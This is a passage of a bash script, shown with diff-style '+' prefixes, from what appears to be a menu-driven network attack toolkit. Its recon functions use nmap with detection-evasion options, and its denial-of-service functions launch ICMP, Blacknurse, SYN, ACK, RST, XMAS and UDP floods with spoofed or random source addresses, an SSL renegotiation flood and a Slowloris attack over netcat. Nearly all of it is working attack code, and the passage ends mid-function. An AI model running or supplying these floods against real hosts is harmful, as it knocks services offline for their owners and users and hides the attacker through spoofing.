MenuColor 20 8 IPsec SCAN ; MenuColor 20 9 RETURN TO MAIN MENU ; MenuEnd 23 + case $m_a in + 1) showip ; reconmenu;; 2) dnsrecon ; reconmenu;; 3) pingsweep ; reconmenu;; 4) quickscan ; reconmenu;; 
5) detailedscan ; reconmenu;; 6) udpscan ; reconmenu;; 7) checkuptime ; reconmenu;; 8) ipsecscan ; reconmenu;; 9) mainmenu ;; 0) exit 0 ;; [bB]) mainmenu ;; *) invalid_entry ; reconmenu ;; + esac +} +## +#----input Target ip/host +## +target_input() { + read_all Please enter the target hostname or IP ; TARGET=${r_a} +} +## +#----input Target port +## +target_input_port() { + read_all Enter port default is 80 ; PORT=${r_a} +} +## +#----START SHOW IP +## +showip() { +echo -ne "$(Info_Screen ' +External IP lookup uses curl...')\n\n" +#---use curl to lookup external IP +echo -ne "${yellow}External IP is detected as:${clear} " ; curl https://icanhazip.com/s/ +#----show interface IP's +echo -ne "\n${yellow}Interface IP's are:${clear}\n" +ip a | grep inet +#----if ip a command fails revert to ifconfig +if ! [[ $? = 0 ]]; then + ifconfig | grep inet +fi +} +## +#----START DNS RECON +## +dnsrecon() { +echo -ne "$(Info_Screen ' +-This module performs passive recon via forward/reverse name lookups +-for the target (as appropriate) and performs a whois lookup')\n\n" +#----need a target IP/hostname to check + target_input + host $TARGET +#----if host command doesnt work try nslookup instead +if ! [[ $? = 0 ]]; then + nslookup $TARGET +fi +#----run a whois lookup on the target +sleep 1 && whois -H $TARGET +if ! [[ $? 
= 0 ]]; then +#----if whois fails, do a curl lookup to ipinfo.io + sleep 1 && curl ipinfo.io/$TARGET +fi +reconmenu +} +## +#----START PING SWEEP +## +pingsweep() { +echo -ne "$(Info_Screen ' +-This module performs a simple ICMP echo 'ping' sweep')\n\n" +#----need to know the subnet to scan for live hosts using pings +target_input +#----this could be done with ping command, but that is extremely difficult to code in bash for unusual subnets so we use nmap instead +nmap -sP -PE $TARGET --reason +} +## +#----START QUICK SCAN +## +quickscan() { +echo -ne "$(Info_Screen ' +-This module conducts a scan using nmap +-Depending on the target, the scan might take a long time to finish')\n\n" +#----we need to know where to scan. Whilst a hostname is possible, this module is designed to scan a subnet range +target_input +#----How fast should we scan the target? +#----Faster speed is more likely to be detected by IDS, but is less waiting around +echo -ne "\n\e[38;5;19;1;48;5;245mEnter the speed of scan (0 means very slow and 5 means fast). +Slower scans are more subtle, but faster means less waiting around.\n${clear}" +read_all Default is 3 ; SPEED=${r_a} +: ${SPEED:=3} +nmap -Pn -sS -T $SPEED $TARGET --reason +} +## +#----START DETAILED SCAN +## +detailedscan() { +echo -ne "$(Info_Screen ' +-This module performs a scan using nmap +-This scan might take a very long time to finish, please be patient')\n\n" +#----need a target hostname/IP +target_input +#----How fast should we scan the target? +#----Faster speed is more likely to be detected by IDS, but is less waiting around +echo -ne "\n\e[38;5;19;1;48;5;245mEnter the speed of scan (0 means very slow and 5 means fast). +Slower scans are more subtle, but faster means less waiting around.\n${clear}" +read_all Default is 3 ; SPEED=${r_a} +: ${SPEED:=3} +#----scan using nmap. 
Note the change in user-agent from the default nmap value to help avoid detection +nmap -script-args http.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43" -Pn -p 1-65535 -sV -sC -A -O -T $SPEED $TARGET --reason +} +## +#----START UDP SCAN +## +udpscan() { +echo -ne "$(Info_Screen ' +-It scans ALL ports on the target system. This may take some time, please be patient')\n\n" +#----need a target IP/hostname +target_input +#----How fast should we scan the target? +#----Faster speed is more likely to be detected by IDS, but is less waiting around +echo -ne "\n\e[38;5;19;1;48;5;245mEnter the speed of scan (0 means very slow and 5 means fast). +Slower scans are more subtle, but faster means less waiting around.\n${clear}" +read_all Default is 3 ; SPEED=${r_a} +: ${SPEED:=3} +#----launch the scan using nmap +nmap -Pn -p 1-65535 -sU -T $SPEED $TARGET --reason +} +## +#----START CHECK UPTIME +## +checkuptime() { + echo -ne "$(Info_Screen ' +-This module will attempt to estimate the uptime of a given server, using hping3 +-This is not guaranteed to work')\n\n" +#----need a target IP/hostname +target_input +#----need a target port +target_input_port +: ${PORT:=80} +dos_port_check +#----how many times to retry the check? +read_all Retries? 3 is ideal and default, 2 might also work ; RETRY=${r_a} +: ${RETRY:=3} +echo -ne "\n${green}Starting..${clear}\n" +#----use hping3 and enable the TCP timestamp option, and try to guess the timestamp update frequency and the remote system uptime. 
+#----this might not work, but sometimes it does work very well +hping3 --tcp-timestamp -S $TARGET -p $PORT -c $RETRY | grep uptime +echo -ne "\n${green}Done.${clear}\n" +} +## +#----START IPSEC SCAN +## +#----we need to know where to scan +ipsecscan() { +target_input +#----Encryption algorithms: DES, Triple-DES, AES/128, AES/192 and AES/256 +ENCLIST="1 5 7/128 7/192 7/256" +#----Hash algorithms: MD5, SHA1, SHA-256, SHA-384 and SHA-512 +HASHLIST="1 2 4 5 6" +#----Authentication methods: Pre-Shared Key, RSA Signatures, Hybrid Mode and XAUTH +AUTHLIST="1 3 64221 65001" +#----Diffie-Hellman groups: 1, 2, 5 and 12 +GROUPLIST="1 2 5 12" +for ENC in $ENCLIST; do + for HASH in $HASHLIST; do + for AUTH in $AUTHLIST; do + for GROUP in $GROUPLIST; do + echo "--trans=$ENC,$HASH,$AUTH,$GROUP" | xargs --max-lines=8 ike-scan --retry=1 -R -M $TARGET | grep -v "Starting" | grep -v "0 returned handshake; 0 returned notify" + done + done + done +done +} +## +#----DOS menu +## +dosmenu() { +MenuTitle DOS FLOOD MENU ; MenuColor 21 1 ICMP ECHO FLOOD ; MenuColor 21 2 ICMP BLACKNURSE ; MenuColor 21 3 TCP SYN FLOOD ; MenuColor 21 4 TCP ACK FLOOD ; MenuColor 21 5 TCP RST FLOOD ; MenuColor 21 6 TCP XMAS FLOOD +MenuColor 21 7 UDP FLOOD ; MenuColor 21 8 SSL DOS ; MenuColor 21 9 SLOWLORIS ; MenuColor 20 10 IPsec DOS ; MenuColor 20 11 DISTRACTION SCAN ; MenuColor 20 12 DNS NXDOMAIN FLOOD ; MenuColor 20 13 RETURN TO MAIN MENU +MenuEnd 24 + case $m_a in + 1) icmpflood ; dosmenu;; 2) blacknurse ; dosmenu;; 3) synflood ; dosmenu;; 4) ackflood ; dosmenu;; 5) rstflood ; dosmenu;; 6) xmasflood ; dosmenu;; 7) udpflood ; dosmenu;; 8) ssldos ; dosmenu;; + 9) slowloris ; dosmenu;; 10) ipsecdos ; dosmenu;; 11) distractionscan ; dosmenu;; 12) nxdomainflood ; dosmenu;; 13) mainmenu ;; 0) exit 0 ;; [bB]) reconmenu ;; *) invalid_entry ; dosmenu ;; + esac +} +#----check a valid integer is given for the port, anything else is invalid +dos_port_check() { +if ! 
[[ "$PORT" =~ ^[0-9]+$ ]]; then + PORT=80 && echo -ne "${red}Invalid port,${clear}${yellow} reverting to port 80${clear}\n" +elif [ "$PORT" -lt "1" ]; then + PORT=80 && echo -ne "${red}Invalid port number chosen!${clear}${yellow} Reverting port 80${clear}\n" +elif [ "$PORT" -gt "65535" ]; then + PORT=80 && echo -ne "${red}Invalid port chosen!${clear}${yellow} Reverting to port 80${clear}\n" +else + echo -ne "${yellow}Using Port${clear}${green} $PORT${clear}\n" +fi +} +## +#----START ICMP FLOOD +## +icmpflood() { + echo -ne "$(Info_Screen ' +-Preparing to launch ICMP Echo Flood using hping3')\n\n" +#----need a target IP/hostname + target_input +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting ICMP echo Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 --flood --spoof $SOURCE $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting ICMP Echo Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 --flood --rand-source $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting ICMP Echo Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 --flood $TARGET +else + echo -ne "${red}Not a valid option! Using interface IP${clear}\n" + echo -ne "${green}Starting ICMP Echo Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 --flood $TARGET +fi +} +## +#----START BLACK NURSE +## +blacknurse() { + echo -ne "$(Info_Screen 'Preparing to launch ICMP Blacknurse Flood using hping3')\n\n" +#----need a target IP/hostname + target_input +#----What source address to use? Manually defined, or random, or outgoing interface IP? 
+ read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting Blacknurse Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 -C 3 -K 3 --flood --spoof $SOURCE $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting Blacknurse Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 -C 3 -K 3 --flood --rand-source $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting Blacknurse Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 -C 3 -K 3 --flood $TARGET +else + echo -ne "${red}Not a valid option! Using interface IP${clear}" + echo -ne "${green}Starting Blacknurse Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -1 -C 3 -K 3 --flood $TARGET +fi +} +## +#----START TCP SYN FLOOD +## +synflood() { + echo -ne "$(Info_Screen 'TCP SYN Flood uses hping3...checking for hping3...')\n\n" +if test -f "/usr/sbin/hping3"; then + echo -ne "${green}hping3 found, continuing!${clear}\n"; +#----hping3 is found, so use that for TCP SYN Flood +#----need a target IP/hostname + target_input +#----need a port to send TCP SYN packets to + target_input_port + : ${PORT:=80} + dos_port_check +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----should any data be sent with the SYN packet? Default is to send no data + read_all Send data with SYN packet? [y]es or [n]o default ; SENDDATA=${r_a} + : ${SENDDATA:=n} +if [[ $SENDDATA = y ]]; then +#----we've chosen to send data, so how much should we send? + read_all Enter number of data bytes to send default 3000 ; DATA=${r_a} + : ${DATA:=3000} +#----If not an integer is entered, use default +if ! [[ "$DATA" =~ ^[0-9]+$ ]]; then + DATA=3000 && echo -ne "${red}Invalid integer! 
${clear}${green} Using data length of 3000 bytes${clear}\n" +fi +#----if $SENDDATA is not equal to y (yes) then send no data +else + DATA=0 +fi +#----note that virtual fragmentation is set. The default for hping3 is 16 bytes. +#----fragmentation should therefore place more stress on the target system +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${yellow}Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --spoof $SOURCE -p $PORT -S $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --rand-source -p $PORT -S $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -d $DATA --flood --frag -p $PORT -S $TARGET +else + echo -ne "${red}Not a valid option!${clear}${yellow} Using interface IP${clear}\n" + echo -ne "${green}Starting TCP SYN Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag -p $PORT -S $TARGET +fi +#----No hping3 so using nping for TCP SYN Flood +else + echo -ne "${red}hping3 not found :(${clear}${yellow} trying nping instead${clear}\n" + echo -ne "${yellow}Trying TCP SYN Flood with nping..this will work but is not ideal${clear}\n" +#----need a valid target ip/hostname +target_input +#----need a valid target port + target_input_port + : ${PORT:=80} + dos_port_check +#----define source IP or use outgoing interface IP + read_all Enter Source IP or use [i]nterface IP default ; SOURCE=${r_a} + : ${SOURCE:=i} +#----How many packets to send per second? 
default is 10k + read_all Enter number of packets to send per second default is 10,000 ; RATE=${r_a} + : ${RATE:=10000} +#----default is 100k, so using default values will send 10k packets per second for 10 seconds + read_all Enter total number of packets to send default is 100,000 ; TOTAL=${r_a} + : ${TOTAL:=100000} + echo -ne "\n${green}Starting TCP SYN Flood...${clear}\n" +#----begin TCP SYN flood using values defined earlier +if [ "$SOURCE" = "i" ]; then + nping --tcp --dest-port $PORT --flags syn --rate $RATE -c $TOTAL -v-1 $TARGET +else + nping --tcp --dest-port $PORT --flags syn --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET +fi +fi +} +## +#----START TCP ACK FLOOD +## +ackflood() { + echo -ne "$(Info_Screen 'TCP ACK Flood uses hping3...checking for hping3...')\n\n" +if test -f "/usr/sbin/hping3"; then + echo -ne "${green}hping3 found, continuing!${clear}\n"; +#----hping3 is found, so use that for TCP ACK Flood + target_input +#----need a port to send TCP ACK packets to + target_input_port + : ${PORT:=80} + dos_port_check +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURCE=${r_a} + : ${SOURCE:=i} +#----should any data be sent with the ACK packet? Default is to send no data + read_all Send data with ACK packet? [y]es or [n]o default ; SENDDATA=${r_a} + : ${SENDDATA:=n} +if [[ $SENDDATA = y ]]; then +#----we've chosen to send data, so how much should we send? + read_all Enter number of data bytes to send default 3000 ; DATA=${r_a} + : ${DATA:=3000} +#----If not an integer is entered, use default +if ! [[ "$DATA" =~ ^[0-9]+$ ]]; then + DATA=3000 && echo -ne "\n${red}Invalid integer!${clear}${yellow} Using data length of 3000 bytes${clear}\n" +fi +#if $SENDDATA is not equal to y (yes) then send no data +else + DATA=0 +fi +#----start TCP ACK flood using values defined earlier +#----note that virtual fragmentation is set. 
The default for hping3 is 16 bytes. +#----fragmentation should therefore place more stress on the target system +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --spoof $SOURCE -p $PORT -A $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --rand-source -p $PORT -A $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -d $DATA --flood --frag -p $PORT -A $TARGET +else + echo -ne "${red}Not a valid option! Using interface IP\n" + echo -ne "${green}Starting TCP ACK Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag -p $PORT -A $TARGET +fi +#----No hping3 so using nping for TCP ACK Flood +else + echo -ne "${red}hping3 not found :(${clear}${yellow} trying nping instead${clear}\n" + echo -ne "${yellow}Trying TCP ACK Flood with nping..this will work but is not ideal${clear}\n" +#----need a valid target ip/hostname + target_input +#----need a valid target port + target_input_port + : ${PORT:=80} + dos_port_check +#----define source IP or use outgoing interface IP + read_all Enter Source IP or use [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----How many packets to send per second? 
default is 10k + read_all Enter number of packets to send per second default is 10,000 ; RATE=${r_a} + : ${RATE:=10000} +#----default is 100k, so using default values will send 10k packets per second for 10 seconds + read_all Enter total number of packets to send default is 100,000 ; TOTAL=${r_a} + : ${TOTAL:=100000} + echo -ne "\n${green}Starting TCP ACK Flood...${clear}\n" +#----begin TCP ACK flood using values defined earlier +if [ "$SOURCE" = "i" ]; then + nping --tcp --dest-port $PORT --flags ack --rate $RATE -c $TOTAL -v-1 $TARGET +else + nping --tcp --dest-port $PORT --flags ack --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET +fi +fi +} +## +#----START TCP RST FLOOD +## +rstflood() { + echo -ne "$(Info_Screen ' +-TCP RST Flood uses hping3...checking for hping3...')\n\n" +if test -f "/usr/sbin/hping3"; then + echo -ne "${green}hping3 found, continuing!${clear}\n"; +#----hping3 is found, so use that for TCP RST Flood + target_input +#----need a port to send TCP RST packets to + target_input_port + : ${PORT:=80} + dos_port_check +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----should any data be sent with the RST packet? Default is to send no data + read_all Send data with RST packet? [y]es or [n]o default ; SENDDATA=${r_a} + : ${SENDDATA:=n} +if [[ $SENDDATA = y ]]; then +#----we've chosen to send data, so how much should we send? + read_all Enter number of data bytes to send default 3000 ; DATA=${r_a} + : ${DATA:=3000} +#----If not an integer is entered, use default +if ! [[ "$DATA" =~ ^[0-9]+$ ]]; then + DATA=3000 && echo -ne "${red}Invalid integer!${clear}${yellow} Using data length of 3000 bytes${clear}\n" +fi +#----if $SENDDATA is not equal to y (yes) then send no data +else + DATA=0 +fi +#----start TCP RST flood using values defined earlier +#----note that virtual fragmentation is set. 
The default for hping3 is 16 bytes. +#----fragmentation should therefore place more stress on the target system +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --spoof $SOURCE -p $PORT -R $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag --rand-source -p $PORT -R $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -d $DATA --flood --frag -p $PORT -R $TARGET +else + echo -ne "${red}Not a valid option! Using interface IP${clear}\n" + echo -ne "${green}Starting TCP RST Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --frag -p $PORT -R $TARGET +fi +#----No hping3 so using nping for TCP RST Flood +else + echo -ne "${red}hping3 not found :(${clear}${yellow} trying nping instead${clear}\n" + echo -ne "${yellow}Trying TCP RST Flood with nping..this will work but is not ideal${clear}\n" +#----need a valid target ip/hostname + target_input +#----need a valid target port + target_input_port + : ${PORT:=80} + dos_port_check +#----define source IP or use outgoing interface IP + read_all Enter Source IP or use [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----How many packets to send per second? 
default is 10k + read_all Enter number of packets to send per second default is 10,000 ; RATE=${r_a} + : ${RATE:=10000} +#----default is 100k, so using default values will send 10k packets per second for 10 seconds + read_all Enter total number of packets to send default is 100,000 ; TOTAL=${r_a} + : ${TOTAL:=100000} + echo -ne "${green}Starting TCP RST Flood...${clear}\n" +#----begin TCP RST flood using values defined earlier +if [ "$SOURCE" = "i" ]; then + nping --tcp --dest-port $PORT --flags rst --rate $RATE -c $TOTAL -v-1 $TARGET +else + nping --tcp --dest-port $PORT --flags rst --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET +fi +fi +} +## +#----START TCP XMAS FLOOD +## +xmasflood() { + echo -ne "$(Info_Screen ' +-TCP XMAS Flood uses hping3...checking for hping3...')\n\n" +if test -f "/usr/sbin/hping3"; then + echo -ne "${green}hping3 found, continuing!${clear}\n"; +#----hping3 is found, so use that for TCP XMAS Flood +#----need a target IP/hostname + target_input +#----need a port to send TCP XMAS packets to + target_input_port + : ${PORT:=80} + dos_port_check +#----What source address to use? Manually defined, or random, or outgoing interface IP? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----should any data be sent with the XMAS packet? Default is to send no data + read_all Send data with XMAS packet? [y]es or [n]o default ; SENDDATA=${r_a} + : ${SENDDATA:=n} +if [[ $SENDDATA = y ]]; then +#----we've chosen to send data, so how much should we send? + read_all Enter number of data bytes to send default 3000 ; DATA=${r_a} + : ${DATA:=3000} +#----If not an integer is entered, use default +if ! 
[[ "$DATA" =~ ^[0-9]+$ ]]; then + DATA=3000 && echo -ne "${red}Invalid integer!${clear}${yellow} Using data length of 3000 bytes${clear}\n" +fi +#----if $SENDDATA is not equal to y (yes) then send no data +else + DATA=0 +fi +#----start TCP XMAS flood using values defined earlier +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting TCP XMAS Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --spoof $SOURCE -p $PORT -F -S -R -P -A -U -X -Y $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting TCP XMAS Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA --rand-source -p $PORT -F -S -R -P -A -U -X -Y $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting TCP XMAS Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 -d $DATA --flood -p $PORT -F -S -R -P -A -U -X -Y $TARGET +else + echo -ne "${red}Not a valid option!${clear}${yellow} Using interface IP${clear}\n" + echo -ne "${green}Starting TCP XMAS Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood -d $DATA -p $PORT -F -S -R -P -A -U -X -Y $TARGET +fi +#----No hping3 so using nping for TCP RST Flood +else + echo -ne "${red}hping3 not found :( ${clear}${yellow}trying nping instead${clear}\n" + echo -ne "${yellow}Trying TCP XMAS Flood with nping..this will work but is not ideal${clear}\n" +#----need a valid target ip/hostname + target_input +#----need a valid target port + target_input_port + : ${PORT:=80} + dos_port_check +#----define source IP or use outgoing interface IP + read_all Enter Source IP or use [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----How many packets to send per second? 
default is 10k + read_all Enter number of packets to send per second default is 10,000 ; RATE=${r_a} + : ${RATE:=10000} +#----default is 100k, so using default values will send 10k packets per second for 10 seconds + read_all Enter total number of packets to send default is 100,000 ; TOTAL=${r_a} + : ${TOTAL:=100000} + echo -ne "${green}Starting TCP XMAS Flood...${clear}\n" +#----begin TCP RST flood using values defined earlier +if [ "$SOURCE" = "i" ]; then + nping --tcp --dest-port $PORT --flags cwr,ecn,urg,ack,psh,rst,syn,fin --rate $RATE -c $TOTAL -v-1 $TARGET +else + nping --tcp --dest-port $PORT --flags cwr,ecn,urg,ack,psh,rst,syn,fin --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET +fi +fi +} +## +#----START UDP FLOOD +## +udpflood() { + echo -ne "$(Info_Screen ' +-UDP Flood uses hping3...checking for hping3...')\n\n" +#----check for hping on the local system +if test -f "/usr/sbin/hping3"; then + echo -ne "${green}hping3 found, continuing!${clear}\n"; +#----hping3 is found, so use that for UDP Flood +#----need a valid target IP/hostname + target_input +#----need a valid target UDP port + target_input_port + : ${PORT:=80} + dos_port_check +#----curently only accepts stdin. Can't define a file to read from + read_all Enter random string data to send ; DATA=${r_a} +#----what source IP should we write to sent packets? + read_all Enter Source IP, or [r]andom or [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----start the attack using values defined earlier +if [[ "$SOURCE" =~ ${validate_ip} ]]; then + echo -ne "${green}Starting UDP Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood --spoof $SOURCE --udp --sign $DATA -p $PORT $TARGET +elif [ "$SOURCE" = "r" ]; then + echo -ne "${green}Starting UDP Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood --rand-source --udp --sign $DATA -p $PORT $TARGET +elif [ "$SOURCE" = "i" ]; then + echo -ne "${green}Starting UDP Flood. 
Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood --udp --sign $DATA -p $PORT $TARGET +#----if no valid source option is selected, use outgoing interface IP +else + echo -ne "${red}Not a valid option! ${clear}${yellow} Using interface IP${clear}\n" + echo -ne "${green}Starting UDP Flood. Use 'Ctrl c' to end and return to menu${clear}\n" + hping3 --flood --udp --sign $DATA -p $PORT $TARGET +fi +#----If no hping3, use nping for UDP Flood instead. Not ideal but it will work. +else + echo -ne "${red}hping3 not found :( ${clear}${yellow}trying nping instead${clear}\n" + echo -ne "${yellow}Trying UDP Flood with nping..${clear}\n" +#----need a valid target IP/hostname + target_input +#----need a port to send UDP packets to + target_input_port + : ${PORT:=80} + dos_port_check +#----what source address should we use in sent packets? + read_all Enter Source IP or use [i]nterface IP default ; SOURE=${r_a} + : ${SOURCE:=i} +#----how many packets should we try to send each second? + read_all Enter number of packets to send per second default is 10,000 ; RATE=${r_a} + : ${RATE:=10000} +#----how many packets should we send in total? + read_all Enter total number of packets to send default is 100,000 ; TOTAL=${r_a} + : ${TOTAL:=100000} +#----default values will send 10k packets each second, for 10 seconds +#----curently only accepts stdin. 
Can't define a file to read from + read_all Enter string to send data ; DATA=${r_a} + echo -ne "${green}Starting UDP Flood...${clear}\n" +#----start the UDP flood using values we defined earlier +if [ "$SOURCE" = "i" ]; then + nping --udp --dest-port $PORT --data-string $DATA --rate $RATE -c $TOTAL -v-1 $TARGET +else + nping --udp --dest-port $PORT --data-string $DATA --rate $RATE -c $TOTAL -v-1 -S $SOURCE $TARGET +fi +fi +} +## +#----START SSL DOS +## +ssldos() { +echo -ne "$(Info_Screen ' +-Using openssl for SSL/TLS DOS')\n\n" +#----need a target IP/hostname + target_input +#----need a target port + read_all Enter target port defaults to 443 ; PORT=${r_a} + : ${PORT:=443} +#----check a valid target port is entered otherwise assume port 443 +if ! [[ "$PORT" =~ ^[0-9]+$ ]]; then + PORT=443 && echo -ne "${red}You provided a string, not a port number! ${clear}${yellow} Reverting to port 443${clear}\n" +fi +if [ "$PORT" -lt "1" ]; then + PORT=443 && echo -ne "${red}Invalid port number chosen! ${clear}${yellow} Reverting to port 443${clear}\n" +elif [ "$PORT" -gt "65535" ]; then + PORT=443 && echo -ne "${red}Invalid port number chosen! ${clear}${yellow} Reverting to port 443${clear}\n" +else + echo -ne "${yellow}Using port ${clear}$PORT\n" +fi +#----do we want to use client renegotiation? + read_all Use client renegotiation? 
[y]es or [n]o default ; NEGOTIATE=${r_a} + : ${NEGOTIATE:=n} +if [[ $NEGOTIATE = y ]]; then +#----if client renegotiation is selected for use, launch the attack supporting it + echo -ne "${green}Starting SSL DOS attack...Use 'Ctrl c' to quit${clear}\n" && sleep 1 +while : for i in {1..10} + do echo "spawning instance, attempting client renegotiation"; echo "R" | openssl s_client -connect $TARGET:$PORT 2>/dev/null 1>/dev/null & +done +elif [[ $NEGOTIATE = n ]]; then +#----if client renegotiation is not requested, lauch the attack without support for it + echo -ne "${green}Starting SSL DOS attack...Use 'Ctrl c' to quit${clear}\n" && sleep 1 +while : for i in {1..10} + do echo "spawning instance"; openssl s_client -connect $TARGET:$PORT 2>/dev/null 1>/dev/null & +done +#----if an invalid option is chosen for client renegotiation, launch the attack without it +else + echo -ne "${red}Invalid option, assuming no client renegotiation${clear}\n${green}Starting SSL DOS attack...Use 'Ctrl c' to quit${clear}\n" && sleep 1 +while : for i in {1..10} + do echo "spawning instance"; openssl s_client -connect $TARGET:$PORT 2>/dev/null 1>/dev/null & +done +fi +} +## +#----START SLOW LORIS +## +slowloris() { + echo -ne "$(Info_Screen ' +-Using netcat for Slowloris attack....')\n" && sleep 1 +#----need a target IP or hostname + target_input +#----need a target port + target_input_port + : ${PORT:=80} + dos_port_check +#----how many connections should we attempt to open with the target? +#----there is no hard limit, it depends on available resources. Default is 2000 simultaneous connections + read_all Enter number of connections to open default 2000 ; CONNS=${r_a} + : ${CONNS:=2000} +#----ensure a valid integer is entered +if ! [[ "$CONNS" =~ ^[0-9]+$ ]]; then + CONNS=2000 && echo -ne "${red}Invalid integer! ${clear}${yellow} Using 2000 connections${clear}\n" +fi +#----how long do we wait between sending header lines? 
+#----too long and the connection will likely be closed +#----too short and our connections have little/no effect on server +#----either too long or too short is bad. Default random interval is a sane choice +echo -ne "\n\e[38;5;19;1;48;5;245mChoose interval between sending headers.${clear}\n" +read_all Default is [r]andom, between 5 and 15 seconds, or enter interval in seconds ; INTERVAL=${r_a} + : ${INTERVAL:=r} +if [[ "$INTERVAL" = "r" ]]; then +#----if default (random) interval is chosen, generate a random value between 5 and 15 +#----note that this module uses $RANDOM to generate random numbers, it is sufficient for our needs + INTERVAL=$((RANDOM % 11 + 5)) +#----check that r (random) or a valid number is entered +elif ! [[ "$INTERVAL" =~ ^[0-9]+$ ]] && ! [[ "$INTERVAL" = "r" ]]; then +#----if not r (random) or valid number is chosen for interval, assume r (random) + INTERVAL=$((RANDOM % 11 + 5)) && echo -ne "${red}Invalid integer! ${clear}${yellow} Using random value between 5 and 15 seconds${clear}\n" +fi +#----run stunnel_client function +stunnel_client +if [[ "$SSL" = "y" ]]; then +#----if SSL is chosen, set the attack to go through local stunnel listener + echo -ne "${green}Launching Slowloris....Use 'Ctrl c' to exit prematurely${clear}\n" && sleep 1 + i=1 +while [ "$i" -le "$CONNS" ]; do + echo -ne "${yellow}Slowloris attack ongoing...this is connection $i, interval is $INTERVAL seconds${clear}" ; echo -e "GET / HTTP/1.1\r\nHost: $TARGET\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\nPragma: no-cache\r\n$RANDOM: $RANDOM\r\n"|nc -i $INTERVAL -w 30000 $LHOST $LPORT 2>/dev/null 1>/dev/null & i=$((i + 1)); done + echo -ne "${yellow}Opened $CONNS connections....returning to menu${clear}\n" +else +#----if SSL is not chosen, launch the attack on the server without using a local listener + echo -ne 
